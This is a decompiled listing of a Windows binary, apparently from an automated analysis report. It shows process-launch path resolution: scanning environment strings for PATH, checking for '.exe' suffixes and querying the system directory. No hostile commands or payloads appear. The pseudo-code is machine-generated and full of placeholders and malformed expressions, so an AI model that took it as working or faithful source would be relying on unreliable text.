				_t1376[0xb3] = __rdx;
				if (( *(__rdx + 0x58) & 0x000000ff) != 0) goto 0x68c6c113;
				if (_t1117 != 0) goto 0x68c6c113;
				_t1376[0x82] = 0;
				_t1376[0xb1] = __rax;
				goto 0x68c6ce65;
				asm("pxor xmm0, xmm0");
				asm("movdqu [ebp+0x400], xmm0");
				if (0 != 0) goto 0x68c6c410;
				_t1376[0xb7] = _t1117;
				_t592 = GetEnvironmentStringsW();
				if (__rax == 0) goto 0x68c6f2d5;
				_t1376[0xb1] = __rax;
				asm("o16 nop [eax+eax]");
				if ( *((short*)(__rax)) == 0) goto 0x68c6c3f5;
				_t1490 = __rax;
				asm("o16 nop [cs:eax+eax]");
				_t1467 = _t1315;
				_t1074 = __rax + 2;
				if ( *((short*)(__rax)) != 0) goto 0x68c6c170;
				if (_t1467 == 1) goto 0x68c6c150;
				if (_t1467 == 0) goto 0x68c6f21d;
				r12d = 0;
				_t836 =  *((short*)(__rax + 2 + __rdx * 2)) - 0x3d;
				if (_t836 == 0) goto 0x68c6c1c0;
				_t1439 = __rdx + 1;
				if (_t836 != 0) goto 0x68c6c1a0;
				goto 0x68c6c150;
				_t16 = _t1439 + 1; // 0x1
				if (_t1439 - _t1467 >= 0) goto 0x68c6f235;
				_t593 = E00007FF77FF768C5EC50(_t592, __ebx, 0xfffffffffffffffc,  &(_t1376[0x9a]), __rax, _t16);
				_t18 = _t1439 + 2; // 0x2
				if (_t1467 - _t18 < 0) goto 0x68c6f24f;
				E00007FF77FF768C5EC50(_t593, __ebx, 0xfffffffffffffffc,  &(_t1376[0x8e]), _t1490 - 0xfffffffffffffffa, _t1315 + 1 - _t1439 + 0xfffffffd);
				_t1376[0x8c] = _t1376[0x9c];
				asm("movups xmm0, [ebp+0x4d0]");
				asm("movaps [ebp+0x450], xmm0");
				_t1123 =  &(_t1376[0x9d]);
				 *(_t1376 - 0x30) =  *_t1123;
				 *(_t1376 - 0x2d) = _t1123[0];
				asm("movups xmm0, [ebp+0x470]");
				asm("movups xmm1, [ebp+0x480]");
				asm("movups [eax-0x9], xmm1");
				asm("movups [eax-0x19], xmm0");
				r8d =  *(_t1376 - 0x21) & 0x000000ff;
				asm("movups xmm0, [ebp-0x20]");
				_t1376[0xa6] =  *(_t1376 - 0x30);
				_t1376[0xa6] =  *(_t1376 - 0x2c) & 0x0000ffff;
				_t1376[0xa6] =  *(_t1376 - 0x2a) & 0x000000ff;
				_t1376[0xa6] =  *((intOrPtr*)(_t1376 - 0x29));
				_t1376[0xa7] = r8b;
				asm("movaps [ebp+0x540], xmm0");
				_t1376[0xa9] =  *((intOrPtr*)(_t1376 - 0x11));
				if (dil == 2) goto 0x68c6c3f5;
				asm("movups xmm0, [esi]");
				asm("movups xmm1, [esi+0x10]");
				asm("movaps [ebp+0x510], xmm1");
				asm("movaps [ebp+0x500], xmm0");
				_t1376[0x90] = _t1376[0x8c];
				asm("movdqa xmm0, [ebp+0x450]");
				asm("movdqa [ebp+0x470], xmm0");
				_t1376[0x91] = dil;
				_t1251 =  &(_t1376[0x91]);
				_t1251[0] = _t1376[0xa6];
				 *_t1251 = _t1376[0xa6];
				_t1001 = _t1376[0x8f];
				_t1376[0x9a] = _t1376[0x90] + _t1001;
				_t1376[0x9b] = _t1001;
				_t1376[0x9c] = 0;
				0x68c706e0();
				asm("movaps xmm0, [ebp+0x450]");
				asm("movaps [ebp-0x30], xmm0");
				 *(_t1376 - 0x20) = _t1376[0x8c];
				 *(_t1376 - 0x18) = dil;
				_t1253 = _t1376 - 0x10;
				 *(_t1253 - 4) = _t1376[0xa6];
				 *(_t1253 - 7) = _t1376[0xa6];
				_t1003 = _t1376[0x7e];
				 *((long long*)(_t1253 + 0x10)) = _t1003;
				asm("movups xmm0, [ebp+0x3e0]");
				asm("movups [edx], xmm0");
				asm("movdqu xmm0, [esi]");
				asm("movups xmm1, [esi+0x10]");
				asm("movaps [ebp+0x480], xmm1");
				asm("movdqa [ebp+0x470], xmm0");
				_t1376[0xb4] = 0;
				E00007FF77FF768C70930( &(_t1376[0x9a]),  &(_t1376[0x7f]), _t1376 - 0x30,  &(_t1376[0x8e]));
				if (_t1376[0x9d] == 2) goto 0x68c6c150;
				if (_t1376[0x9a] == 0) goto 0x68c6c150;
				HeapFree(_t1072, _t1315, _t1349);
				goto 0x68c6c150;
				FreeEnvironmentStringsW(_t1437);
				_t1469 =  *((intOrPtr*)(_t1376[0xb3] + 0x48));
				_t1131 =  ==  ? _t1469 : _t1376[0xb7];
				_t1376[0xb7] =  ==  ? _t1469 : _t1376[0xb7];
				_t1004 = _t1003 + _t1003;
				asm("repe inc ecx");
				asm("dec ax");
				asm("punpcklqdq xmm7, xmm0");
				asm("movdqa xmm6, [0x154a3d]");
				asm("o16 nop [cs:eax+eax]");
				_t1352 = _t1376[0xb7];
				if (_t1352 == 0) goto 0x68c6cc5f;
				asm("dec ax");
				if (_t1004 == 0) goto 0x68c6c490;
				if (_t1004 == 2) goto 0x68c6f1a0;
				asm("pshufd xmm0, xmm7, 0xee");
				asm("dec ax");
				goto 0x68c6c516;
				asm("o16 nop [cs:eax+eax]");
				asm("pshufd xmm0, xmm7, 0xee");
				asm("dec ax");
				_t846 = _t1004;
				if (_t846 == 0) goto 0x68c6c50e;
				_t80 = _t1004 - 1; // -1
				if (_t846 == 0) goto 0x68c6c4bc;
				if (_t846 != 0) goto 0x68c6c4b0;
				_t847 = _t80 - 7;
				if (_t847 < 0) goto 0x68c6c50e;
				asm("o16 nop [cs:eax+eax]");
				_t1139 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1469 + 0x3d8)) + 0x3d8)) + 0x3d8)) + 0x3d8)) + 0x3d8)) + 0x3d8)) + 0x3d8)) + 0x3d8));
				if (_t847 != 0) goto 0x68c6c4d0;
				asm("movdqa xmm7, xmm6");
				_t1319 =  *((intOrPtr*)(_t1139 + 0x3d8));
				_t1459 = _t1074;
				if (_t1074 - _t1139 < 0) goto 0x68c6c558;
				_t1140 =  *((intOrPtr*)(_t1319 + 0x160));
				if (_t1140 == 0) goto 0x68c6f0f6;
				r13d =  *(_t1319 + 0x3d0) & 0x0000ffff;
				_t1007 = (_t1004 & 0xfffffff8) + 0xfffffffffffffff9;
				_t1320 = _t1140;
				if (r13w -  *((intOrPtr*)(_t1140 + 0x3d2)) >= 0) goto 0x68c6c530;
				_t851 = _t1007;
				if (_t851 == 0) goto 0x68c6c600;
				if (_t851 == 0) goto 0x68c6c5ee;
				_t97 = _t1007 - 2; // -1
				if (_t851 == 0) goto 0x68c6c5a5;
				asm("o16 nop [cs:eax+eax]");
				if (_t851 != 0) goto 0x68c6c590;
				_t852 = _t97 - 7;
				if (_t852 < 0) goto 0x68c6c5ee;
				if (_t852 != 0) goto 0x68c6c5b0;
				goto 0x68c6c607;
				asm("o16 nop [cs:eax+eax]");
				_t107 = _t1459 + 1; // 0x1
				_t1376[0xb7] = _t1352 - 1;
				_t1355 = _t1320 + _t1459 * 0x38 + 0x168;
				_t1460 = _t1459 << 5;
				asm("movq xmm7, xmm7");
				if ( *((char*)(_t1320 + _t1460 + 0x18)) != 2) goto 0x68c6c850;
				if (_t1376[0x80] == 0) goto 0x68c6c450;
				 *(_t1379 + 0x20) =  *((intOrPtr*)(_t1355 + 0x30));
				E00007FF77FF768C72180( *((intOrPtr*)(_t1355 + 0x30)),  &(_t1376[0x9a]), _t1376[0x7f], _t1376[0x80],  *((intOrPtr*)(_t1355 + 0x28)));
				if (_t1376[0x9a] != 0) goto 0x68c6c450;
				_t1260 = _t1376[0x9b];
				_t1376[0xa0] = 0;
				_t856 = _t1260;
				if (_t856 == 0) goto 0x68c6ca0b;
				if (_t856 == 0) goto 0x68c6c77e;
				if (_t856 == 0) goto 0x68c6c6ed;
				asm("o16 nop [cs:eax+eax]");
				if (_t856 != 0) goto 0x68c6c6d0;
				_t1261 = _t1260 +  !(_t1260 - 0x00000001 & 0x00000007);
				_t857 = _t1260 - 2 - 7;
				_t1080 = _t107;
				if (_t857 < 0) goto 0x68c6c77e;
				asm("o16 nop [eax+eax]");
				if (_t857 != 0) goto 0x68c6c700;
				_t1376[0xa6] = 0;
				_t1376[0xa7] =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1376[0x9c] + 0x3d8 + _t1376[0x9d] * 8)) + 0x3d8 + _t1355 * 8)) + 0x3d8 + _t1261 * 8)) + 0x3d8 + _t1261 * 8)) + 0x3d8 + _t1261 * 8)) + 0x3d8 + _t1261 * 8)) + 0x3d8 + _t1261 * 8)) + 0x3d8 + _t1261 * 8)) + 0x3d8 + _t1261 * 8)) + 0x3d8 + _t1261 * 8));
				_t1376[0xa8] = _t1261 + 0xfffffff8 - 1;
				E00007FF77FF768C72320(_t1376 - 0x30,  &(_t1376[0xa6]),  &(_t1376[0xa0]));
				_t1376[0x98] = _t1376[4];
				asm("movups xmm0, [ebp+0x10]");
				asm("movaps [ebp+0x4b0], xmm0");
				asm("movdqu xmm0, [ebp-0x30]");
				asm("movups xmm1, [ebp-0x20]");
				asm("movups xmm2, [ebp-0x10]");
				asm("movups xmm3, [ebp]");
				asm("movaps [ebp+0x4a0], xmm3");
				asm("movaps [ebp+0x490], xmm2");
				asm("movaps [ebp+0x480], xmm1");
				asm("movdqa [ebp+0x470], xmm0");
				_t1263 = _t1376[6];
				_t1030 = _t1376[7];
				if (_t1030 - _t1080 < 0) goto 0x68c6ca42;
				asm("o16 nop [eax+eax]");
				_t1158 =  *((intOrPtr*)(_t1263 + 0x160));
				if (_t1158 == 0) goto 0x68c6ca40;
				if (( *(_t1263 + 0x3d0) & 0x0000ffff) -  *((intOrPtr*)(_t1158 + 0x3d2)) >= 0) goto 0x68c6c820;
				goto 0x68c6ca42;
				_t1442 =  *((intOrPtr*)(_t1355 + 0x10));
				_t861 = _t1442;
				_t1376[0xb1] = _t1080;
				if (_t861 == 0) goto 0x68c6c884;
				if (_t861 < 0) goto 0x68c6f213;
				E00007FF77FF768BAD0E0();
				if (_t1030 != 0) goto 0x68c6c889;
				goto 0x68c6f201;
				memcpy(_t1456, _t1466, _t1489);
				_t609 =  *(_t1355 + 0x18) & 0x000000ff;
				_t1376[0xa6] = _t1442;
				_t1376[0xa7] = _t1030;
				_t1376[0xa8] = _t1442;
				_t1376[0xa9] = _t609;
				_t1494 =  *((intOrPtr*)(_t1355 + 0x30));
				_t863 = _t1494;
				if (_t863 == 0) goto 0x68c6c902;
				_t1032 = _t1494 >> 0x3e;
				if (_t863 != 0) goto 0x68c6f1cd;
				_t1443 = _t1494 + _t1494;
				sil = _t609 & 0xffffff00 | _t863 == 0x00000000;
				if (_t1443 == 0) goto 0x68c6c90c;
				E00007FF77FF768BAD0E0();
				if (_t1032 != 0) goto 0x68c6c918;
				goto 0x68c6f1bd;
				r12d = 0;
				goto 0x68c6c918;
				_t1084 = _t1355 + _t1355;
				if (_t1084 == 0) goto 0x68c6f1bd;
				_t1325 = _t1080 + _t1460;
				memcpy(??, ??, ??);
				asm("movdqu xmm0, [ebp+0x530]");
				asm("movups xmm1, [ebp+0x540]");
				asm("movdqa [ebp-0x30], xmm0");
				asm("movaps [ebp-0x20], xmm1");
				 *(_t1376 - 0x10) = _t1494;
				 *(_t1376 - 8) = _t1084;
				 *_t1376 = _t1494;
				_t1357 =  *((intOrPtr*)(_t1325 + 0x10));
				_t867 = _t1357;
				if (_t867 == 0) goto 0x68c6c977;
				if (_t867 < 0) goto 0x68c6f1f0;
				E00007FF77FF768BAD0E0();
				if (_t1032 != 0) goto 0x68c6c97c;
				goto 0x68c6f1d7;
				memcpy(??, ??, ??);
				_t1376[0xa6] = _t1357;
				_t1376[0xa7] = _t1032;
				_t1376[0xa8] = _t1357;
				_t1376[0xa9] =  *(_t1325 + 0x18) & 0x000000ff;
				_t1376[0xb6] = 0;
				E00007FF77FF768C70930( &(_t1376[0x8e]),  &(_t1376[0x7f]), _t1376 - 0x30,  &(_t1376[0xa6]));
				if (_t1376[0x91] == 2) goto 0x68c6c450;
				if (_t1376[0x8e] == 0) goto 0x68c6c450;
				_t1166 =  *0x68e84100; // 0x1c7f3850000
				HeapFree(??, ??, ??);
				goto 0x68c6c450;
				_t1376[0xa6] = 0;
				_t1376[0xa7] = _t1032;
				_t1376[0xa8] = _t1166;
				_t1167 = _t1376 - 0x30;
				E00007FF77FF768C72320(_t1167,  &(_t1376[0xa6]),  &(_t1376[0xa0]));
				goto 0x68c6cb37;
				_t1272 = _t1032 * 0x38;
				_t1376[0xac] =  *((intOrPtr*)(_t1167 + _t1272 + 0x198));
				asm("movups xmm0, [ecx+edx+0x168]");
				asm("movups xmm1, [ecx+edx+0x178]");
				asm("movups xmm2, [ecx+edx+0x188]");
				asm("movaps [ebp+0x550], xmm2");
				asm("movaps [ebp+0x540], xmm1");
				asm("movaps [ebp+0x530], xmm0");
				 *((long long*)(_t1167 + _t1272 + 0x198)) = _t1376[0x94];
				asm("movaps xmm0, [ebp+0x470]");
				asm("movaps xmm1, [ebp+0x480]");
				asm("movaps xmm2, [ebp+0x490]");
				asm("movups [ecx+edx+0x188], xmm2");
				asm("movups [ecx+edx+0x178], xmm1");
				asm("movups [ecx+edx+0x168], xmm0");
				asm("movups xmm0, [ecx+eax]");
				asm("movups xmm1, [ecx+eax+0x10]");
				asm("movups [edx+0x10], xmm1");
				asm("movups [edx], xmm0");
				asm("movups xmm0, [edx]");
				asm("movups xmm1, [edx+0x10]");
				asm("movups [ecx+eax], xmm0");
				asm("movups [ecx+eax+0x10], xmm1");
				_t1376[4] = _t1376[0xb0];
				asm("movaps xmm0, [ebp+0x570]");
				asm("movaps [ebp+0x10], xmm0");
				asm("movdqa xmm0, [ebp+0x530]");
				asm("movaps xmm1, [ebp+0x540]");
				asm("movaps xmm2, [ebp+0x550]");
				asm("movaps xmm3, [ebp+0x560]");
				asm("movaps [ebp], xmm3");
				asm("movaps [ebp-0x10], xmm2");
				asm("movaps [ebp-0x20], xmm1");
				asm("movdqa [ebp-0x30], xmm0");
				_t1376[0xb0] = _t1376[4];
				asm("movaps xmm0, [ebp+0x10]");
				asm("movaps [ebp+0x570], xmm0");
				asm("movdqa xmm0, [ebp-0x30]");
				asm("movaps xmm1, [ebp-0x20]");
				asm("movaps xmm2, [ebp-0x10]");
				asm("movaps xmm3, [ebp]");
				asm("movaps [ebp+0x560], xmm3");
				asm("movaps [ebp+0x550], xmm2");
				_t1376[0x81] = _t1376[0x81] - 1;
				asm("movaps [ebp+0x540], xmm1");
				asm("movdqa [ebp+0x530], xmm0");
				if (_t1376[0xa0] == 0) goto 0x68c6cbc9;
				if (_t1443 == 0) goto 0x68c6f263;
				_t1036 =  *((intOrPtr*)( *((intOrPtr*)(_t1325 + 8)) + 0x3d8));
				_t1376[0x80] = _t1036;
				_t1376[0x7f] = _t1443 - 1;
				 *((long long*)(_t1036 + 0x160)) = 0;
				HeapFree(??, ??, ??);
				if (_t1376[0xa9] == 2) goto 0x68c6c450;
				if (_t1376[0xa6] == 0) goto 0x68c6cc1c;
				HeapFree(??, ??, ??);
				if (_t1376[0xaa] == 0) goto 0x68c6cc33;
				HeapFree(??, ??, ??);
				if ((_t1376[0xb0] & 0x000000ff) == 2) goto 0x68c6c450;
				if (_t1376[0xad] == 0) goto 0x68c6c450;
				HeapFree(??, ??, ??);
				goto 0x68c6c450;
				_t1037 = _t1376[0x81];
				_t1376[0x85] = _t1037;
				asm("movdqu xmm0, [ebp+0x3f8]");
				asm("movdqu [ebp+0x418], xmm0");
				_t1376[0x82] = 1;
				E00007FF77FF768BAD0E0();
				if (_t1037 == 0) goto 0x68c6f280;
				 *_t1037 = 0x48544150;
				_t1376[0xa6] = 4;
				_t1376[0xa7] = _t1037;
				_t1376[0xa8] = 4;
				_t1376[0xa9] = 0;
				 *(_t1376 - 0x30) = _t1037 + 4;
				 *(_t1376 - 0x28) = _t1037;
				 *(_t1376 - 0x20) = 0;
				_t1275 = _t1376 - 0x30;
				0x68c706e0();
				asm("movups xmm0, [ebp+0x530]");
				asm("movups xmm1, [ebp+0x540]");
				asm("movaps [ebp-0x30], xmm0");
				asm("movaps [ebp-0x20], xmm1");
				asm("movdqu xmm0, [ebp+0x470]");
				asm("movdqa [ebp-0x10], xmm0");
				 *_t1376 = _t1376[0x90];
				_t1038 = _t1376[0x84];
				if (_t1038 == 0) goto 0x68c6ce24;
				_t1376[0xb1] = _t1376[0x83];
				_t1376[0xb2] = _t1275;
				_t1376[0xb7] = _t1038;
				if (_t1275 * 0x38 == 0) goto 0x68c6cdc0;
				r9d =  *(_t1038 + 0x198);
				 *(_t1379 + 0x20) = 1;
				_t621 =  *__imp__CompareStringOrdinal();
				if (_t621 == 3) goto 0x68c6cd80;
				_t882 = _t621 - 1;
				if (_t882 != 0) goto 0x68c6cdfa;
				goto 0x68c6cdc7;
				asm("o16 nop [eax+eax]");
				if (_t882 < 0) goto 0x68c6d1f7;
				_t1376[0xb1] = _t1376[0xb1] - 1;
				goto 0x68c6cd4d;
				_t1450 = _t1376[0xb3];
				if (_t621 != 2) goto 0x68c6f11b;
				if (_t1376[0xb7] == 0) goto 0x68c6ce24;
				if ( *(_t1376 - 0x30) != 0) goto 0x68c6ce2d;
				goto 0x68c6ce40;
				if ( *(_t1376 - 0x30) == 0) goto 0x68c6ce40;
				HeapFree(??, ??, ??);
				if ( *(_t1376 - 0x10) == 0) goto 0x68c6ce59;
				HeapFree(??, ??, ??);
				_t1376[0xb1] = _t1376[0xb7][0x3d8 + _t1376[0xb2] * 8];
				_t1092 =  *((intOrPtr*)(_t1450 + 0x28));
				_t1463 =  *((intOrPtr*)(_t1450 + 0x30));
				_t1376[0xb7] = _t1092;
				if (_t1463 == 0) goto 0x68c6cecc;
				if (_t1463 - 4 >= 0) goto 0x68c6ce8a;
				goto 0x68c6ceb2;
				asm("bswap eax");
				asm("adc ecx, 0xffffffff");
				_t1278 =  ==  ? 0x68c72b10 : 0x68c72b20;
				_t1376[0xb8] = 1;
				if ( *((long long*)( ==  ? 0x68c72b10 : 0x68c72b20))() == 0) goto 0x68c6ceea;
				_t1376[0x8e] = 0x68e2dd78;
				_t1376[0x8f] = 0;
				goto 0x68c6d9b4;
				if (_t1463 - 3 <= 0) goto 0x68c6cf57;
				if ((0x68fffbad << 0x00000005 |  *(_t1463 + _t1092 - 4) & 0x000000ff) != 0x2e) goto 0x68c6cf57;
				if ((0x68fffbad << 0x00000005 | _t1092[_t1463 - 3] & 0x000000ff) != 0x65) goto 0x68c6cf57;
				if ((0x68fffbad << 0x00000005 | _t1092[_t1463 - 2] & 0x000000ff) != 0x78) goto 0x68c6cf57;
				goto 0x68c6cf59;
				if (_t1463 == 0x68c72b10) goto 0x68c6cf9c;
				_t782 = _t1092[0x7ff768c72b10] & 0x000000ff;
				if (_t782 == 0x2f) goto 0x68c6cf76;
				if (_t782 != 0x5c) goto 0x68c6cf60;
				if (0 == 0) goto 0x68c6d06c;
				_t1376[0xb8] = 1;
				_t1402 = _t1463;
				E00007FF77FF768C643D0(_t1376[0xb0] & 0x000000ff, _t782, 0, 0,  &(_t1376[0x8e]), _t1092, _t1402);
				goto 0x68c6d9a6;
				_t1182 = _t1092;
				goto 0x68c6cfbb;
				asm("o16 nop [cs:eax+eax]");
				if (_t782 == 0) goto 0x68c6d17d;
				if (0 != 0) goto 0x68c6cfb0;
				if (_t1182 == _t1402) goto 0x68c6d1bb;
				_t633 =  *_t1182 & 0x000000ff;
				if (sil < 0) goto 0x68c6cfdd;
				_t1183 =  &(_t1182[1]);
				goto 0x68c6d050;
				if (sil - 0xdf <= 0) goto 0x68c6d01e;
				_t803 = (_t1183[1] & 0x3f) << 6;
				if (_t633 - 0xf0 < 0) goto 0x68c6d02e;
				_t714 = (_t633 & 7) << 0x12;
				goto 0x68c6d037;
				goto 0x68c6d050;
				_t816 = _t714 << 0x00000006 | _t803 | (_t714 << 0x00000006 | _t803) << 0x0000000c;
				if (_t816 - 0xffff > 0) goto 0x68c6d059;
				asm("o16 nop [cs:eax+eax]");
				goto 0x68c6cfb2;
				_t719 = _t816 & 0x000003ff | 0x0000dc00;
				goto 0x68c6cfb2;
				_t913 = _t1463;
				if (_t913 < 0) goto 0x68c6f362;
				sil = (_t1183[3] & 0x3f | (_t1183[2] & 0x3f | _t803) << 0x00000006 | _t714) & 0xffffff00 | _t913 > 0x00000000;
				E00007FF77FF768BAD0E0();
				if (0x7ff768c72b11 == 0) goto 0x68c6f370;
				memcpy(??, ??, ??);
				_t1376[0xa6] = _t1463;
				_t1376[0xa7] = 0x7ff768c72b11;
				_t1376[0xa8] = _t1463;
				_t1376[0xa9] = 0;
				 *(_t1376 - 0x20) = _t1376[0xa8];
				 *(_t1376 - 0x18) = _t1376[0xa9] & 0x000000ff;
				 *(_t1376 - 0x17) = _t1376[0xa9];
				 *((short*)(_t1376 - 0x13)) = _t1376[0xa9] & 0x0000ffff;
				 *((char*)(_t1376 - 0x11)) = _t1376[0xa9] & 0x000000ff;
				 *(_t1376 - 0x30) = _t1376[0xa6];
				 *(_t1376 - 0x28) = _t1376[0xa7];
				r8d = 4;
				0x68c63420();
				asm("movdqa xmm0, [ebp-0x30]");
				asm("movaps xmm1, [ebp-0x20]");
				asm("movaps [ebp+0x540], xmm1");
				asm("movdqa [ebp+0x530], xmm0");
				_t1499 = _t1376[0xa7];
				_t1480 = _t1376[0xa8];
				_t1376[0xb4] = 1;
				E00007FF77FF768C72B30(_t816, 0x7ff768c72b11, _t1376 - 0x30, _t1499, _t1480);
				if ( *(_t1376 - 0x28) == 0) goto 0x68c6d189;
				_t1048 =  *(_t1376 - 0x20);
				_t1376[0x90] = _t1048;
				asm("movdqu xmm0, [ebp-0x30]");
				asm("movdqa [ebp+0x470], xmm0");
				goto 0x68c6d98a;
				goto 0x68c6ced3;
				_t1284 = _t1480;
				0x68c6b6d0();
				if (_t1048 == 0) goto 0x68c6d978;
				if (_t1284 != 2) goto 0x68c6d209;
				if (( *_t1048 & 0x0000ffff) != 0x2e2e) goto 0x68c6d209;
				r8d = 2;
				goto 0x68c6d24a;
				if (_t1463 - 0xf > 0) goto 0x68c6d24f;
				_t1376[0xb5] = _t1048;
				asm("o16 nop [eax+eax]");
				if (_t1376[0xb7][_t1048] == 0x2e) goto 0x68c6d276;
				_t1049 =  &(_t1048[0]);
				if (_t1463 != _t1049) goto 0x68c6d1e0;
				goto 0x68c6d282;
				if ( *(_t1376 - 0x30) != 0) goto 0x68c6ce2d;
				goto 0x68c6ce40;
				if (_t1284 == 0x68e2dd40) goto 0x68c6d26c;
				if ( *((char*)(_t1049 + _t1284 - 1)) != 0x2e) goto 0x68c6d210;
				if (_t1284 - _t1284 - 0x68e2dd40 + 1 < 0) goto 0x68c6f3af;
				if (_t1284 != 0x68e2dd40) goto 0x68c6d946;
				goto 0x68c6d950;
				_t1376[0xb8] = 1;
				E00007FF77FF768BBBDF0(0x2e, _t1284 - 0x68e2dd40, 0x68e2dd40, _t1463, __r10);
				_t1376[0xb5] = _t1049;
				goto 0x68c6d282;
				goto 0x68c6d950;
				_t1376[0xb5] = _t1049;
				if (0x68e2dd40 == 0) goto 0x68c6d2cb;
				_t1481 = _t1480 + 0x68e2dd40;
				_t1376[0xa6] = _t1481;
				_t1376[0xa7] = 0x7ff768e2dd41;
				_t1376[0xa8] = 0;
				_t1376[0xa9] = 1;
				_t1376[0xb8] = 1;
				E00007FF77FF768C623F0(_t1376 - 0x30,  &(_t1376[0xa6]), _t1463);
				if (( *(_t1376 - 0x18) & 0x000000ff) != 2) goto 0x68c6d5e1;
				_t1376[0xb8] = 1;
				E00007FF77FF768C631B0(_t816, 0, _t1049,  &(_t1376[0x8e]), _t1463);
				if (_t1376[0x91] != 2) goto 0x68c6d2ff;
				_t1376[0xb8] = 1;
				E00007FF77FF768C5EB70(_t816,  &(_t1376[0x8e]));
				goto 0x68c6d3e6;
				asm("movdqu xmm0, [ebp+0x470]");
				asm("movups xmm1, [ebp+0x480]");
				asm("movdqa [ebp+0x530], xmm0");
				asm("movaps [ebp+0x540], xmm1");
				_t1361 = _t1376[0xa8];
				_t1376[0xb4] = 1;
				_t1287 = _t1361;
				E00007FF77FF768C66FD0();
				if (_t1049 == 0) goto 0x68c6d34b;
				if (_t1361 - _t1287 < 0) goto 0x68c6d34b;
				_t1376[0xa8] = _t1287;
				asm("movdqa xmm0, [ebp+0x530]");
				 *(_t1376 - 0x20) = _t1376[0xa8];
				_t1051 = _t1376[0xa9];
				 *(_t1376 - 0x18) = _t1051;
				asm("movdqa [ebp-0x30], xmm0");
				0x68c65350();
				if (_t1376[0xb5] == 1) goto 0x68c6d397;
				0x68c6b830();
				_t1362 =  *(_t1376 - 0x28);
				E00007FF77FF768C72B30(_t816, _t1376[0xb5] - 1,  &(_t1376[0x9a]), _t1362,  *(_t1376 - 0x20)); // executed
				if ( *(_t1376 - 0x30) == 0) goto 0x68c6d3c7;
				_t1411 = _t1362;
				HeapFree(??, ??, ??);
				if (_t1376[0x9b] == 0) goto 0x68c6d3e6;
				goto 0x68c6eaf2;
				_t1376[0xa0] = 0;
				_t1376[0xa1] = 2;
				_t1376[0xa2] = 0;
				r8d = 0x200;
				_t1376[0xa5] = _t1051;
				_t1376[0xb2] = _t1051;
				r14d = 0;
				r15d = 0;
				_t935 = _t1411 - 0x201;
				if (_t935 < 0) goto 0x68c6d456;
				goto 0x68c6d470;
				asm("o16 nop [cs:eax+eax]");
				if (_t935 >= 0) goto 0x68c6d538;
				if (_t1411 - 0x201 >= 0) goto 0x68c6d470;
				goto 0x68c6d4d3;
				asm("o16 nop [cs:eax+eax]");
				_t1412 = _t1411 - _t1499;
				if (_t1481 - _t1499 - _t1412 >= 0) goto 0x68c6d4a6;
				E00007FF77FF768DBDB10(_t1481 - _t1499 - _t1412,  &(_t1376[0xa0]), _t1499, _t1412);
				_t1376[0xb2] = _t1376[0xa0];
				_t1053 = _t1376[0xa1];
				_t1376[0xa5] = _t1053;
				r15d = 0xffffffff;
				_t1500 =  <  ? _t1376[0xb2] : _t1499;
				_t1376[0xa2] = _t1500;
				_t1098 = _t1500;
				SetLastError(_t1375);
				_t660 = GetSystemDirectoryW(??, ??);
				r12d = _t660;
				if (_t660 != 0) goto 0x68c6d4fa;
				if (GetLastError() != 0) goto 0x68c6d6f6;
				r8d = r12d;
				if (_t1098 != _t1412) goto 0x68c6d440;
				if (GetLastError() != 0x7a) goto 0x68c6f29b;
				_t1100 =  >=  ? _t1053 : _t1098 + _t1098;
				_t1413 =  >=  ? _t1053 : _t1098 + _t1098;
				if (_t1413 - 0x201 >= 0) goto 0x68c6d470;
				goto 0x68c6d456;
				if (_t1500 - _t1413 < 0) goto 0x68c6f384;
				E00007FF77FF768C5EC50(0xffffffff, _t816 & 0x000003ff | 0x0000dc00, _t1053,  &(_t1376[0xa6]), _t1376[0xa5], _t1413);
				0x68c65350();
				if (_t1376[0xb5] == 1) goto 0x68c6d578;
				0x68c6b830();
				_t1365 = _t1376[0xa7];
				E00007FF77FF768C72B30(_t816 & 0x000003ff | 0x0000dc00, _t1376[0xb5] - 1,  &(_t1376[0x9a]), _t1365, _t1376[0xa8]); // executed
				if (_t1376[0xa6] == 0) goto 0x68c6d5b1;
				HeapFree(??, ??, ??);
				asm("movdqu xmm0, [ebp+0x4d0]");
				asm("movdqu [ebp+0x478], xmm0");
				_t1054 = _t1376[0x9c];
				_t1376[0x91] = _t1054;
				_t1376[0x8e] = 0;
				goto 0x68c6d718;
				_t1484 = _t1376 - 0x30;
				goto 0x68c6d61e;
				asm("o16 nop [cs:eax+eax]");
				_t1376[0xb8] = 1;
				E00007FF77FF768C623F0(_t1484,  &(_t1376[0xa6]), _t1365);
				if (( *(_t1376 - 0x18) & 0x000000ff) == 2) goto 0x68c6d2cb;
				_t1338 =  *(_t1376 - 0x20);
				if (_t1338 != 0) goto 0x68c6d642;
				if ( *(_t1376 - 0x30) == 0) goto 0x68c6d600;
				_t1213 =  *0x68e84100; // 0x1c7f3850000
				_t669 = HeapFree(??, ??, ??);
				goto 0x68c6d600;
				_t1101 = _t1376 - 0x17;
				r9d =  *_t1101;
				_t1376[0x9a] = _t1101[0];
				_t1376[0x9a] = r9d;
				r9d = _t1376[0x9a];
				_t1101[0] = _t1376[0x9a];
				 *_t1101 = r9d;
				 *(_t1376 - 0x30) = _t1213;
				 *(_t1376 - 0x20) = _t1338;
				 *(_t1376 - 0x18) = _t669;
				0x68c65350();
				if (_t1376[0xb5] == 1) goto 0x68c6d69b;
				0x68c6b830();
				E00007FF77FF768C72B30(0, _t1376[0xb5] - 1,  &(_t1376[0x8e]),  *(_t1376 - 0x28),  *(_t1376 - 0x20));
				if ( *(_t1376 - 0x30) == 0) goto 0x68c6d6c8;
				HeapFree(??, ??, ??);
				if (_t1376[0x8f] != 0) goto 0x68c6f0ac;
				_t1376[0xb8] = 1;
				E00007FF77FF768C623F0(_t1484,  &(_t1376[0xa6]),  *(_t1376 - 0x28));
				goto 0x68c6d612;
				GetLastError();
				_t1056 = _t1054 << 0x00000020 | 0x00000002;
				_t1376[0x8f] = _t1056;
				_t1376[0x8e] = 1;
				sil = 1;
				if (_t1376[0xb2] == 0) goto 0x68c6d738;
				_t1421 = _t1376[0xa5];
				sil = sil | HeapFree(??, ??, ??) & 0xffffff00 | _t1376[0x90] == 0x00000000;
				if (sil != 1) goto 0x68c6eadd;
				_t1376[0xb8] = 1;
